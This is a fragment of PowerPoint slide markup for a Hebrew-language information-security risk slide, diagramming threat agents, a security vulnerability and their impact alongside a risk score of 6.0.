                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>2</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3744035" y="8160785"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>הערה בנוגע לסיכונים</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="129415" y="5910536"/>
            <a:ext cx="5897010" cy="390006"/>
            <a:chOff x="-29610" y="1058047"/>
            <a:chExt cx="5897010" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-29610" y="1058047"/>
              <a:ext cx="5897010" cy="386519"/>
              <a:chOff x="-29610" y="1070390"/>
              <a:chExt cx="5897010" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5257800" y="1070390"/>
                <a:ext cx="609600" cy="386519"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25000"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>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r" rtl="1" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">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   גורמי</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">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
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">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br>
                <a:r>
                  <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">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 השפעה</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105372"/>
                <a:ext cx="139699" cy="305288"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="179" y="1565"/>
                  <a:ext cx="192" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="275" y="1757"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="131" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="275" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="131" y="1853"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-29610" y="1073624"/>
                <a:ext cx="575799" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">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Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">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br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">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Agents</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1189590" y="1078960"/>
                <a:ext cx="838200" cy="357187"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 80130"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>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r" rtl="1" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">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 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">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גורמי איום</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879477" y="1073877"/>
                <a:ext cx="1020368" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>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r" rtl="1" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">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         </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">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חולשת</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">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
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">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br>
                <a:r>
                  <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">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   אבטחת מידע</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2027790" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="41" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="38" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="732390" y="1256471"/>
                <a:ext cx="457200" cy="1083"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1067053"/>
              <a:ext cx="220306" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1211643"/>
              <a:ext cx="110153" cy="95140"/>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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1357955" cy="727"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Right Brace 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2738468" y="6443548"/>
            <a:ext cx="292533" cy="2241840"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89876"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4216588" y="7238182"/>
            <a:ext cx="270030" cy="1665187"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89876"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
